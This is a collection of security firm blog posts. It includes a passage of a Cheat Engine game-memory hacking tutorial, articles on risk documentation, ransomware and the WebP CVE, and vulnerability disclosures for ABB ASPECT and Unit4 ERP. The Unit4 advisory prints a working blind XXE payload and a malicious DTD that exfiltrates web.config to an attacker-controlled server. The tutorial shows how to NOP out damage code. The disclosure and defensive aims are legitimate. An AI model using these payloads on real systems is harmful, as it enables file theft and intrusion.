Using trial and error to manipulate the addresses and their corresponding values should narrow down the health value. By clicking the toggle box in the left-hand column, it is possible to freeze a value. Freezing a value means that, in theory, it should not change:

Now, when taking damage again from a monster, the value should not change from 318. However, after taking damage, notice in the below screenshot that the health value has in fact changed:

So, that address can now be ruled out as the correct value. By rinsing and repeating the above steps on the remaining two addresses, it is apparent that neither holds the correct health value.

Where next?

Incorrect values

When trying to find a value in memory, the data type is often assumed – in this case, a 4-byte integer for the health value. In reality, most games will store values like health as a float.

When scanning memory returns the wrong results, or none at all, it is often worth changing the data type to see if that identifies the correct value.

In this example, changing the value type to a float gave 273 results. To avoid repeating the above steps to narrow down the results, and to save time, assume that two potential values have been identified:

After taking damage from an enemy:

With the two values identified, freezing one of them should help determine whether it is the correct one:

By taking damage again, it can be determined which value is correct:

As the health decreased, the first value frozen was incorrect. Freezing the next value:

Now, entering combat and observing the health value confirms it is the correct one, as no damage is taken:

Cheat Engine Debugger Functionality

Cheat Engine comes packaged with a built-in debugger, among many other things, that can allow the end user to walk through the underlying assembly code to gain a deeper understanding of the game’s functionality and logic.

Using the health value as an example, if we right-click on the value and select “Find out what writes to this address”, Cheat Engine will launch the debugger and show which addresses interact with the health value:

Taking damage from an enemy should populate the debugger window with activity:

After taking damage, the debugger window will now show the address, opcodes and instructions which wrote to the health value address:

Selecting the “Show disassembler” option will display the assembly instructions listed above and surrounding instructions:

As the highlighted instructions above are the ones that write to the health value address and thus dictate the damage the player takes, it would be beneficial to remove these instructions so the player takes no damage. Luckily, Cheat Engine has built-in functionality to do this, by right-clicking the instruction and selecting “Replace with code that does nothing”:

The result is that Cheat Engine has overwritten the assembly instructions with “nop” instructions, meaning “no operation”, which simply do nothing when executed:

Now, when going into combat, no damage will be taken:

Identifying structures and values in memory

Whilst using the methodology above to find other values, such as mana, or number of potions the player has, is still valid, there are easier methods to quickly find these values in memory.

When a game developer creates a player object, they will typically assign values such as health, mana, energy, experience, player name and more in the same class or structure. Using this assumption, after a value such as health has been located, the surrounding values in memory should all be relevant to the character in some way.

This can be seen in action by utilising the in-memory structure capabilities of Cheat Engine. Going back to the health value, once identified, right click and select “Disassemble this memory region”:

Select Tools menu at the top, then “Dissect data/structures”:

On the following screen, select the “Structures” menu and then “Define new structure”:

This effectively takes the current memory region, in this case from the health value and attempts to group other values in that memory region into a formatted structure as seen below:

A lot of the value types displayed, such as float, byte, etc., are Cheat Engine’s best guesses at how the values should be displayed.

Observing the values, one jumps out straight away, the mana value:

Scrolling further down the list, it is possible to see other values such as gold:

Changing the gold value:

Fame value:

Player strength values:

Tampering with game memory values can undermine the fairness of the game, for example by changing scores on leaderboards or player stats. Falsifying values to impress friends or show off on online forums erodes trust among players and makes real achievements seem fake, causing doubt and breaking the friendly vibe among gamers.

Prevention

To prevent efforts to hack or manipulate a game, developers have a few options:

Encrypted values:

Encrypting memory values makes initial starting values such as health difficult to find. This adds an extra layer of complexity for hackers attempting to uncover sensitive information.
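A language-agnostic illustration of the idea is sketched below in Python (a real game would implement this in native code): the stored bytes are XOR-masked with a per-write random key, so a scanner searching memory for the literal health value finds nothing stable.

import secrets

class MaskedInt:
    """Stores an integer XOR-masked so the plaintext value never sits in memory."""

    def __init__(self, value: int):
        self._key = secrets.randbits(32)
        self._masked = value ^ self._key

    @property
    def value(self) -> int:
        return self._masked ^ self._key

    @value.setter
    def value(self, new_value: int) -> None:
        self._key = secrets.randbits(32)      # re-key on every write
        self._masked = new_value ^ self._key

health = MaskedInt(320)
health.value -= 2        # take damage; the bytes held in memory change unpredictably
print(health.value)      # 318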

Code Integrity Checks:

Code integrity checks involve adding mechanisms that verify the integrity of the game’s executable code during runtime. This can include checksums or hashing algorithms that ensure the code hasn’t been tampered with. If a hacker attempts to modify the code, these checks will detect the alteration and can trigger anti-cheat measures or even prevent the game from running.
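A bare-bones version of such a check is sketched below in Python; the executable path and reference hash are placeholders, and a production scheme would also protect the reference value and the check itself from tampering.

import hashlib

# Placeholder reference hash – in practice shipped or fetched out-of-band.
KNOWN_GOOD_SHA256 = "0000000000000000000000000000000000000000000000000000000000000000"

def file_sha256(path: str) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Placeholder executable name.
if file_sha256("game.exe") != KNOWN_GOOD_SHA256:
    raise SystemExit("Integrity check failed: executable has been modified")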

Anti-Cheat Software:

Dedicated anti-cheat software employs various techniques to detect and prevent cheating. This can range from heuristic analysis of running processes to signature-based detection of known cheats. Anti-cheat tools often work alongside the game client, scanning for unauthorised modifications or abnormal behaviour. When a cheat is detected, the anti-cheat software can take action, such as issuing warnings, suspending accounts, or banning players.

Server-Side Validation:

If a game utilises online connectivity and cross-play, server-side validation means that critical game actions and data are verified on the game server, not just on the player’s device. This prevents players from manipulating or forging data on their end. For example, if a player claims to have achieved a high score, the server verifies the legitimacy of the claim before updating the leaderboard. This approach minimises the impact of client-side hacks and ensures the accuracy of game state.

Randomised Memory Addresses:

Randomising memory addresses involves changing the memory location of key variables, functions, or data structures each time the game is launched. This makes it challenging for hackers to find and manipulate specific values consistently across different game sessions. As they need to identify new memory addresses with each playthrough, it significantly increases the complexity of reverse engineering and cheating attempts.

Anti-Debugging Techniques:

Anti-debugging techniques involve incorporating measures within the game’s code to thwart attempts by hackers to analyse and manipulate the code using debugging tools. These techniques can include checks for debugging flags, breakpoints, or hooks commonly used by reverse engineers. Employing anti-debugging measures adds another layer of defence, making it more difficult for hackers to gain insights into the game’s inner workings.

By implementing these measures in tandem, game developers can create a multi-layered defence against hacking and cheating. Each approach targets different aspects of the cheating process, from manipulating memory values to injecting unauthorised code, making it increasingly difficult for hackers to compromise the game’s integrity.

Conclusion

It becomes clear that gaming holds an enchanting allure, often hiding its intricate workings beneath layers of entertainment. For the average player, the inner mechanisms and logic remain concealed, like a well-kept secret. Yet, with the revelation of game hacking, an entirely new realm of exploration unfurls – a space where curiosity and creativity blend harmoniously. Game hacking offers an engaging and interactive gateway into the world of reverse engineering, unlocking the door to understanding the complex underpinnings that power our favourite virtual worlds.

However, this fascinating journey comes with a significant caveat. The very thrill of game hacking that invites exploration can also exact a heavy toll on the gaming industry. The continuous battle against cheating siphons resources, both financial and developmental, as game studios invest in creating anti-cheat mechanisms and safeguarding the integrity of gameplay. Cheats, once unleashed, wield the potential to tarnish the reputation of games and cast a shadow over the experiences players hold dear. This can ultimately lead to lost customers and a diminished community spirit, as the spectre of dishonest manipulation threatens to unravel the bonds that gamers share.

In conclusion, game hacking unveils a world of hidden marvels beneath the surface of gaming, offering an engaging pathway into reverse engineering. Yet, this path, while captivating, brings to light the real-world repercussions that cheats and hacks can introduce. The industry’s efforts to maintain a fair and enjoyable gaming environment stand in stark contrast to the shadowy exploits of malicious manipulation, reminding us that while curiosity may drive exploration, the ethical balance is essential to preserve the magic of gaming for everyone.

Blog post was written by Ben Allford of Prism Infosec.

Why Failing to Document Risk is a Risky Strategy

Phil Robinson explores why failing to document risk leaves businesses vulnerable to cyber threats and costly consequences.

Understanding risk and its potential impact can help the business prepare for and survive the realization of its worst fears. It’s a pre-emptive measure and can head off threats and provide a way to control those risks continuously. Yet, despite the advantages of documenting risk, a surprisingly small number of businesses are doing it.

According to the UK government’s Cybersecurity Longitudinal Survey, only 30% of businesses have any documentation in place outlining how much cyber risk they are willing to accept (their risk appetite), and only 50% of businesses maintain a risk register (that details the cyber risks they are exposed to). 

Consequently, these businesses are not managing their cyber security posture appropriately because, without identifying and evaluating risk, these organizations cannot effectively invest in and defend their critical assets. In fact, it’s such a concern that the cyber security risk assessment is one of the four areas highlighted for further monitoring in the third wave of the report being carried out this year.

Why Is This Happening?

Those businesses that do document risk do so to meet contractual obligations or the requirements of certifications such as ISO 27001, and tend to have board oversight of their cyber security risk. It’s also a common requirement for those seeking cyber security insurance, which 61% of businesses now hold in some form, states the survey. It’s stipulated in compliance requirements associated with specific sectors, such as the Sarbanes-Oxley Act in US finance or PCI DSS to protect payment card data.

Many may not document their risk because it can be daunting. Documentation is the final stage in the risk assessment process, preceded by scoping, identification, analysis, and evaluation. First, the business will need to decide where to focus the assessment. This is best approached by process or department to make it more manageable and to allow the necessary stakeholders to be involved. 

Once the scope has been decided, risks can be identified, and the likelihood of them being realized is assessed, followed by the potential impact and mitigation. But let’s look at each stage in turn.

Identifying risks may seem straightforward, but it’s not just a matter of inventorying data assets. Also under consideration are business-critical processes that, if subjected to attack, could prevent the business from functioning. Typical components subject to a risk assessment include hardware, software, data sets, services (including cloud / 3rd party services), personal information, business-critical information, and even staff members. Cyber threats, and the tactics, techniques, and procedures used to execute them, also need to be identified along with their possible outcomes, and threat frameworks such as MITRE ATT&CK can help here.

Impact and Harm

The next stage is to estimate the likelihood of a risk being realized and its potential impact, i.e., the extent to which it can harm the business. Some use a “Red/Amber/Green” (RAG) system, making it more difficult to communicate risk to the board. It’s important to keep it simple and refer to the risk as low, minor, moderate, high, or severe and give a business context to the impact, such as loss of business/contract, loss of reputation, financial impact, or punitive measures/penalties rather than some obscure numerical value.

In managing risk, the organization should determine a threshold at which risks should be treated, known as the risk appetite. All organizations must take some risks. Otherwise, it would be too difficult to pursue the business objectives. However, the risk appetite for an organization can vary based upon factors such as the industry it operates in and company culture. For those risks that have been identified that exceed the organization’s risk appetite, they should be treated (for example, by applying further controls, changing practices to avoid the risk, or transferring the risk to a third party such as an insurer) such that any remaining residual risk is then at or below the acceptable level. 

All of these elements are then documented in a risk register, which should be reviewed regularly, as well as when disruptive events happen, be that the installation of new technology, a change in the direction of the business, or following a security incident. In this respect, the risk register should be considered a living document. Ownership of risk decisions must also be documented and again reviewed when such events occur in case there is a change to the designated person with responsibility.

Making the Process Easier

Because of the methodical stages involved, risk assessment lends itself well to a framework approach. Established risk methodologies include ISO 27005:2011, Information Security Forum (ISF) IRAM2, NIST (SP800-30), Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE), Octave Allegro, and ISACA COBIT 5 for risk. These can make it easier, but many businesses outsource risk assessment to a third party. Regardless of which is chosen, however, the assessment should always be tailored to the business to ensure it is both relevant and effective.

As onerous as the process may seem, failing to assess, manage, and document risk, as 70% of the businesses in the Longitudinal survey seem to have done, can prove costly in the long term. These businesses are much more exposed because they do not know and understand the risks they face, have made no effort to reduce the risk through controls, and have made no contingency plans in case of a compromise. 

The survey found that 74% of businesses were subjected to a cyber attack during the 12 months before June 2022, with 84% suffering repeat attacks. Almost a quarter (22%) were adversely impacted, losing access to data or services, having accounts compromised, or software, systems, or devices corrupted or damaged. In contrast, a third had to invest in new security controls, and the same number had to devote resources to dealing with such incidents. 

That’s proof, if any were needed, that neglecting to document risk can prove costly in the long run. But documenting risk is also valuable in another respect in that it gives the business oversight and more control over its operations. Having that knowledge can then bring about a better cultural understanding of cybersecurity throughout the business and help inform business decisions so that the process not only helps prevent harm but also helps guide future activity.

This article was originally published on Spiceworks

WebP’s Weak Spot: Unveiling the Hidden Vulnerability

Last month (September 2023), Google reported a newly discovered security issue in Google Chrome, which it described as a ‘heap buffer overflow in WebP within Google Chrome’ and tracked as CVE-2023-4863. This was initially thought to be just another minor bug in the browser – something to be addressed in a future release.

However, as the root cause was investigated further, it was found that the vulnerability existed not within Chrome itself, but within the libwebp library. This new information allowed security researchers to gain a better understanding of the potential wider impact of the issue and its links to other, earlier reported vulnerabilities, including CVE-2023-41064.

With the wider impact now better understood, it became apparent that the vulnerability was not confined to Chrome but had far-reaching consequences due to the widespread use of the WebP format within various applications, including browsers, email clients, mobile apps, and operating systems.

What is libwebp and why is this a big deal?

The libwebp library is an image processing library, developed by Google and widely used by applications such as Chrome, to process and render images in the WebP format.

WebP provides a number of benefits over other, more established image formats (such as PNG and JPEG) thanks to its flexibility in supporting features such as lossy and lossless compression, transparency, and animation, making it a popular choice for software developers wanting to integrate image rendering functionality into their applications and services.

Typically, you’ll see WebP used in places like:

  • Websites: Modern content management systems and web frameworks often provide plugins or tools for serving WebP images. 
  • Android Devices: Android 4.2.1 (API level 17) and higher support WebP natively.
  • Apple Devices: WebP isn’t natively supported, but third-party libraries, such as SDWebImage, provide WebP integration.
  • MacOS/Windows: Some modern image editors and viewers support WebP natively. For others, plugins or extensions might be required.

What’s the risk?

The vulnerability was found to exist within the way the libwebp library handles Huffman coding within the WebP file format. Huffman coding, a method of representing data efficiently, was being mishandled, resulting in a potential buffer overflow: a specially crafted WebP image could cause data to be written beyond the allocated memory space, corrupting memory in a way that an attacker can exploit.
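
To make the failure mode concrete, the short sketch below (illustrative Python, not libwebp’s actual C code) mimics a decoder filling a fixed-size lookup table with values decoded from an untrusted file. If the decoder trusts the attacker-controlled index instead of checking it against the size of the allocation, data lands outside the buffer; in C, that is exactly a heap buffer overflow.

# Illustrative only - not libwebp code. A decoder allocates a fixed-size
# lookup table, then fills it using values decoded from the untrusted file.
TABLE_SIZE = 256
table = bytearray(TABLE_SIZE)

def fill_table(decoded_entries):
    """decoded_entries: (index, value) pairs decoded from the image data."""
    for index, value in decoded_entries:
        # The crucial check: a crafted file can supply an index past the end
        # of the allocation. In C, omitting this check writes into adjacent
        # heap memory; here we simply refuse the input.
        if not 0 <= index < TABLE_SIZE:
            raise ValueError(f"corrupt image: table index {index} out of range")
        table[index] = value

try:
    fill_table([(10, 0x41), (300, 0x90)])  # 300 is past the end of the table
except ValueError as err:
    print(err)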

In real-world terms, this vulnerability has the potential to allow an attacker to create a specially crafted WebP image containing a malicious payload which, when processed by a vulnerable version of the libwebp library, could lead to that payload being executed on the end user’s device.

So, just by viewing an image, your device could be compromised.

Who’s at risk?

The good news? Not everyone! The bad news? Well, it’s a decent chunk of the internet. Vulnerable systems include web browsers, image processors, and applications using affected libraries to handle WebP, covering all types of device, from mobiles and desktops to smart devices (such as your TV).

Chances are, if it can be used to view an image, it’s more than likely affected.

How can I protect myself from this and other similar vulnerabilities in future?

Well, the good news is that there are ways of managing not only the known risks but also the unknown risks associated with vulnerabilities of this type.

Patch, Patch, Patch: For the end user, the most powerful tool at your disposal is patching. It may seem like an overused cliché, but staying up to date with patches and updates remains one of the most effective defences against vulnerabilities and security risks. Vendors, including Google, have started rolling out patches, and it’s crucial to keep your systems updated.

If there’s an update with a security patch for WebP handling for your application, jump on it like it’s a winning lottery ticket.
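
If you want to check which libwebp version a system is actually using, one quick way on Linux or macOS is to ask the shared library itself via its WebPGetDecoderVersion() call, as in the hedged Python sketch below. Note that many applications (Chrome included) bundle their own copy of libwebp, so this only tells you about the system-wide library; the fix for CVE-2023-4863 is understood to have shipped in libwebp 1.3.2.

# Rough check of the system libwebp version (Linux/macOS). Assumes the
# shared library is on the default search path; treat this as a sanity
# check, not a substitute for your package manager or vendor advisories.
import ctypes
import ctypes.util

path = ctypes.util.find_library("webp")
if path is None:
    print("libwebp shared library not found")
else:
    lib = ctypes.CDLL(path)
    v = lib.WebPGetDecoderVersion()  # packed as (major << 16) | (minor << 8) | revision
    print(f"libwebp decoder version: {(v >> 16) & 0xFF}.{(v >> 8) & 0xFF}.{v & 0xFF}")
    # CVE-2023-4863 is understood to be fixed in libwebp 1.3.2 and later.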

For the Tech Professionals amongst us, there are also a number of actions you can take to minimise the risk to your systems and end users, including:

  • Memory Sanitisation: Developers should guard memory allocations and writes, especially when handling external inputs (like WebP files from the internet). This can be achieved through techniques such as bounds checking, careful memory management, and running memory sanitisers during testing.
  • Input Validation: Always validate and sanitise input. Ensure that imported or user-supplied media, such as WebP images, conform to expected standards before processing (see the sketch after this list).
  • Use a Web Application Firewall (WAF): WAFs can detect and block malicious requests, including those delivering files with unwanted surprises, such as malicious code.
  • Regular Code Audits: Regularly review and test your code base for vulnerabilities. Automated tools can help, but manual reviews by experienced developers are invaluable.
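
As an example of the input validation point above, the hypothetical helper below performs a cheap first-pass check on an uploaded file before it is ever handed to an image library: it confirms the RIFF/WEBP container signature and a sane length field, and rejects anything else. The function name and limits are ours; deeper parsing should still happen in a fully patched library.

# Hypothetical first-pass validation of an uploaded image. It only checks
# the WebP container signature ("RIFF" .... "WEBP") and the declared RIFF
# length; real decoding should still be done by a patched library.
import struct

def looks_like_webp(data: bytes, max_size: int = 20 * 1024 * 1024) -> bool:
    if len(data) < 12 or len(data) > max_size:
        return False
    if data[:4] != b"RIFF" or data[8:12] != b"WEBP":
        return False
    # The RIFF length field (offset 4, little-endian) should not claim
    # more data than was actually received.
    declared = struct.unpack_from("<I", data, 4)[0]
    return declared + 8 <= len(data)

# Tiny demonstration with a minimal, well-formed container header:
sample = b"RIFF" + (16).to_bytes(4, "little") + b"WEBPVP8 " + b"\x00" * 16
print(looks_like_webp(sample))     # True
print(looks_like_webp(b"GIF89a"))  # False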

On the surface of it, these types of vulnerabilities may sound scary – especially when the risks are embellished and exaggerated by those ever diligent news outlets that consider a Twitter post to be a credible source – but remember, by the time the story of a new vulnerability has broken, the software and service providers impacted have been busy behind the scenes working on addressing the risk, with an update or patch following soon after. 

Privilege Escalation and RCE Vulnerabilities for Multiple ABB Appliances [ASPECT, Matrix, Nexus]. (CVE-2023-0635 / CVE-2023-0636)

Prism Infosec recently identified two high-risk vulnerabilities within the ABB ASPECT Control Engine, affecting versions prior to 3.07.01: a remote code execution (RCE) flaw and a privilege escalation flaw.

Background

During a recent security testing engagement, Prism Infosec discovered an ABB ASPECT appliance through traditional enumeration techniques. A Google search revealed that this is a building management control system, and that this instance had been misconfigured to be publicly accessible from the Internet.

Typically, administrative interfaces should not be externally accessible over the Internet unless absolutely necessary. Where this is unavoidable, they should require a secondary layer of protection, such as VPN access or IP address whitelisting, combined with further controls such as multi-factor authentication (MFA).
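
Network-level controls such as firewall rules or a VPN are the right place to enforce this, but purely as an illustration of the allowlisting principle, the hedged Python/Flask sketch below rejects any request to an admin route that does not originate from an approved range. The route and address ranges are examples of ours, not ABB's.

# Illustrative sketch of IP allowlisting in front of an admin interface.
# In practice this belongs in a firewall or VPN layer; the route and the
# address ranges below are examples only.
import ipaddress
from flask import Flask, abort, request

app = Flask(__name__)
ALLOWED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),       # internal management network
    ipaddress.ip_network("192.168.10.0/24"),  # operations VPN range
]

@app.before_request
def restrict_to_allowlist():
    client = ipaddress.ip_address(request.remote_addr)
    if not any(client in network for network in ALLOWED_NETWORKS):
        abort(403)  # refuse anything outside the approved ranges

@app.route("/admin")
def admin():
    return "admin interface"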

Prism Infosec gained initial access to the admin interface by using the default credentials documented in the Aspect Control Engine’s publicly available user manual. 

Exploitation

Following this access, Prism Infosec were able to identify that the Network Diagnostic function of the ASPECT appliance was vulnerable to Remote Code Execution, which allowed us to gain access, via a reverse shell, to the underlying Linux operating system and the associated internal network infrastructure.

Full details of the Proof of Concept (PoC) are currently being withheld to ensure that all ABB customers have a chance to update and patch the vulnerable software. 

Once initial access was achieved, a check of the current privileges revealed that the software was running as the ‘apache’ user, a relatively low-privileged account with limited functionality.

After further investigation, Prism Infosec identified an unintended privilege escalation vulnerability within the underlying OS of the ABB appliance, which allowed the ‘apache’ user to escalate to a root account.

For an adversary, the possibilities from here are extensive, from exfiltrating local data to enumerating and moving laterally through the internal network.

To summarise, Prism Infosec went from an Internet-exposed IP address to a rooted Linux system inside an internal network.

Resolution

Prism Infosec quickly made our client aware of these vulnerabilities and disclosed the findings to ABB shortly afterwards. We were delighted to see both parties acknowledge and act on the issues quickly: the client disabled the exposed access, and ABB patched the software and released an update and advisory to their customers.

Note: At the time of writing, Prism Infosec will not divulge exact details of how to reproduce these vulnerabilities, to ensure users have time to patch and remediate. This blog therefore gives a high-level description only; our detailed description of how to reproduce the vulnerabilities will be released in 90 days (30th August 2023).

Credits and References

  • CVE-2023-0635 – Privilege escalation to root was discovered by George C
  • CVE-2023-0636 – Remote code execution was discovered by Karolis N

CVE-2023-0635 Privilege escalation to root
The successful attacker can open a shell and escalate access privileges to root.

CVSS v3.1 Base Score: 7.8
CVSS v3.1 Temporal Score: 7.4
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:W/RC:C
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:W/RC:C
NVD Summary Link: https://nvd.nist.gov/vuln/detail/CVE-2023-0635

CVE-2023-0636 Remote code execution
The successful attacker is able to leverage a vulnerable network diagnostic component of the ASPECT interface to perform Remote Code Execution.

CVSS v3.1 Base Score: 7.2
CVSS v3.1 Temporal Score: 7.0
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:F/RC:C

CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:F/RC:C
NVD Summary Link: https://nvd.nist.gov/vuln/detail/CVE-2023-0636

Timeline

  • Vulnerabilities discovered during the assessment: [05/10/2022]
  • Vendor Informed: [07/10/2022]
  • First Meeting with ABB and Prism Infosec: [11/10/2022]
  • Final Meeting with ABB and Prism Infosec: [22/05/2023]
  • Vendor Confirmed Fix, and communicated to customers: [01/06/2023]
  • CVE Assigned: [05/06/2023]
  • Prism Infosec Blog Post: [05/06/2023]

How to Protect the Business Against a Data Breach/Ransomware

Threats to the business can come in various forms, but by far the most common and significant is a data breach. Usually leveraged via a successful phishing or spear-phishing attack, this results in either sensitive information (such as a username and/or password) being disclosed or a compromise of target endpoints such as laptops or mobile devices.

Both attack vectors could then see unauthorised remote logins to organisational services or data, which an attacker can then use to exfiltrate sensitive information. This could include personal data (names, addresses, dates of birth, medical data, etc.), banking details, credit card information, or company intellectual property.

The information will then either be sold (usually at a price per record), used to target other individuals with fraudulent attacks, or used in a ransomware situation, where the data may be permanently encrypted and/or released publicly if the attackers do not receive payment within a certain time. Over the last few years, it’s this latter scenario that has come to dominate, as organised criminal gangs become more adept at extorting funds from targets.

Are you prepared?

Yet, despite the volume of data breaches reported year after year, organisations still fail to prepare for what is rapidly becoming almost inevitable. If the business isn’t ready, it can’t respond effectively or communicate with internal and external stakeholders such as customers and clients, the C-suite, and third-party organisations such as the ICO. The result is a loss of confidence and unwanted publicity, as well as the organisation spending unnecessary time resolving the incident and potentially suffering the financial loss of paying a ransom.

To protect themselves from such attacks, organisations should implement a variety of defences. It’s important to deliver regular security awareness programmes to staff, warning of the risk of clicking on unknown links or opening files or attachments, for instance, but these need to be regularly scheduled and appropriate. The most effective security awareness briefings are relatively succinct and engaging, for example containing relevant examples of the potential impacts, rather than being a lecture.

With regard to technical security controls, the business should implement endpoint and cloud-based protection that can defend against both known and new attacks, as well as monitoring and alerting systems to facilitate rapid identification and reporting of potential attempts and actual breaches within the business environment. Also put in place strong endpoint configuration that limits user privileges, restricts the execution of unknown and untrusted applications, and reduces the attack surface by removing unnecessary functionality (command prompts, PowerShell, default bundled software, etc.).

Locking down data is essential, so ensure that data storage is resilient to unauthorised attempts to modify files, using techniques such as inherent versioning and/or offline data snapshots and backups. Remain vigilant by implementing monitoring and alerting mechanisms across server, endpoint, and cloud environments, and keep things fresh with regular security reviews of endpoints, data storage, and applications to test their resilience to ransomware attacks.

If the worst does happen, you’ll want an effective incident response plan in place and a prepared team, having conducted scenario-based attack simulations (“red team” exercises) as well as desktop simulated breach exercises, to ensure that the security teams know how to handle breaches quickly and effectively.

Policy and process

However, it cannot be overstated how important it is to have a reasonable set of security policies, procedures, and plans, applicable to the business, to support information security and to govern user behaviour.

An overarching information security policy should put security centre stage and demonstrate management’s commitment to it, as well as prescribing a framework of other documents such as an acceptable use policy, incident response plan, and access control and data handling policies. Many organisations are already aligned or certified to standards such as ISO 27001, which provides a framework for an information security management system (ISMS).

Be Proactive

Finally, be proactive. Regularly review the data that is being collected and stored by the organisation, whether on-premises or in the cloud, assess its importance to the business, and ensure that there are suitable controls in place to protect it from exposure and loss. Ensure that offline backups, snapshots, and/or data versioning exist, and consider the impact of data being deleted, encrypted, or leaked. Regularly advise your staff on existing and new cyber security threats, and consider future and evolving attacks such as voice and messaging attacks, as detection of email-based phishing forces attackers to seek alternative avenues.

CVE-2022-34001 – XML External Entity (XXE) in Unit 4 ERP 7.9 (Also Known As “Agresso”)

Prism Infosec identified an XXE vulnerability within Unit4’s Enterprise Resource Planning (ERP) software, which has been assigned CVE-2022-34001. Unit4’s ERP software is a well-known enterprise management suite, which includes financial and project management tools.

Prism Infosec discovered a blind XXE within a specific function of the ERP software. This would allow an authenticated attacker to read arbitrary files from the host server.

CVE-2022-34001 – Proof of Concept

The ERP API supported the use of SOAP calls; curiously, the ‘ExecuteServerProcessAsynchronously’ SOAP call allowed the insertion of arbitrary XML within its body. To test for XXE, Prism Infosec used a simple outbound HTTP call to a Burp Collaborator server to confirm that the parser allowed entity expansion and honoured the SYSTEM keyword.

The following request shows a snippet of the ‘ExecuteServerProcessAsynchronously’ SOAP call with the embedded XXE payload within XML tags:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
<Variant>104</Variant>
<Xml>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://burp_collaborator.com"> %dtd;]><xxx/>]]>
</Xml>
</input>
<credentials>
…[REDACTED]…
</credentials>

This resulted in an HTTP request to the Prism Infosec controlled server:

The request was received from IP address [REDACTED] at 2022-Mar-01 11:24:45 UTC.

GET / HTTP/1.1
Host: burp_collaborator.com
Connection: Keep-Alive

This confirmed that entity expansion was enabled and that protocols such as HTTP and FILE could be leveraged. As the SOAP request only responded with an error message, the attack was considered ‘blind’, so out-of-band techniques were required to exfiltrate data from the host.

On an attacker-controlled server, the following malicious DTD file was hosted (test.xml):

<!ENTITY % start "<[CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % outfile SYSTEM "file:///E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config">
<!ENTITY % goout "<!ENTITY &#37; pop SYSTEM 'http://attacker_controlled_server:8000/%start;%outfile;
%end;
'>">

The SOAP call was then initiated again, this time referencing the malicious DTD along with the parameter entities needed to exfiltrate the data:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
<Variant>104</Variant>
<Xml>
<![CDATA[
<!DOCTYPE doc[
<!ENTITY % dtd SYSTEM "http://attacker_controlled_server:8000/test.xml">
%dtd;
%goout;
%pop;
]>
]]>

</Xml>
</input>
--[Cut]--

On the attacker-controlled server, a listener was set up to serve the malicious DTD and to catch the contents of the file being read:

Serving HTTP on 0.0.0.0 port 8000 ...
api-services_ip - - [02/Mar/2022 12:54:16] "GET /test.xml HTTP/1.1" 200 -
api-services_ip - - [02/Mar/2022 12:54:04] "GET /%3C[CDATA[%0D%0A%3C!--%0D%0A%20%20For%20more%20information%20on%20how%20to%20configure%20your%20ASP.NET%20application,%20please%20visit%20%0D%0A%20%20http://go.microsoft.com/fwlink/?LinkId=301879%0D%0A%20%20--%3E%0D%0A%3Cconfiguration%3E%0D%0A%20%20%3CconfigSections

--[Cut]--

The decoded data reveals the content of the “E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config” file on the api-services host:

/<[CDATA[
<!--
  For more information on how to configure your ASP.NET application, please visit 
  http://go.microsoft.com/fwlink/?LinkId=301879
  -->
<configuration>
  <configSections>
    <section name="agresso.web.api" type="Agresso.Web.Http.Configuration.WebApi.WebApiConfigurationSection, Agresso.Web.Http" />
  </configSections>
--[Cut]--

The XXE could also be leveraged to make Server-Side Request Forgery (SSRF) calls, mapping out the internal network and making arbitrary requests to internal hosts.
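
The general mitigation for this class of issue (independent of Unit4’s own fix, which is not detailed here) is to configure any XML parser handling untrusted input so that it refuses DTDs and never resolves external entities. A minimal illustrative sketch in Python using lxml, not Unit4 code, might look like this:

# Illustrative only, not Unit4 code: configure the XML parser to refuse
# external entity resolution before handling untrusted input.
from lxml import etree

def parse_untrusted_xml(xml_bytes):
    parser = etree.XMLParser(
        resolve_entities=False,  # never expand external or parameter entities
        load_dtd=False,          # do not load external DTDs
        no_network=True,         # never make network requests while parsing
    )
    return etree.fromstring(xml_bytes, parser)

# With these settings, a payload like the one shown above is handled
# without any outbound request to the attacker-controlled server.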

Prism Infosec contacted the vendor (Unit4) and supplied all the necessary information so that Unit4 could confirm and subsequently remediate the vulnerability. Unit4 responded in a timely manner and started working on a fix for all customers.

Although the test was completed on the latest version of Unit 4 ERP, we have been advised that previous versions of the software may also be affected. 

Note: Prism Infosec did not confirm whether the vulnerability had been patched; no further testing was conducted after the initial engagement.

Timeline – CVE-2022-34001

  • Discovered by Prism Infosec during an engagement for client: March 1st 2022
  • Vendor Informed: March 17th 2022
  • CVE Assigned: June 19th 2022
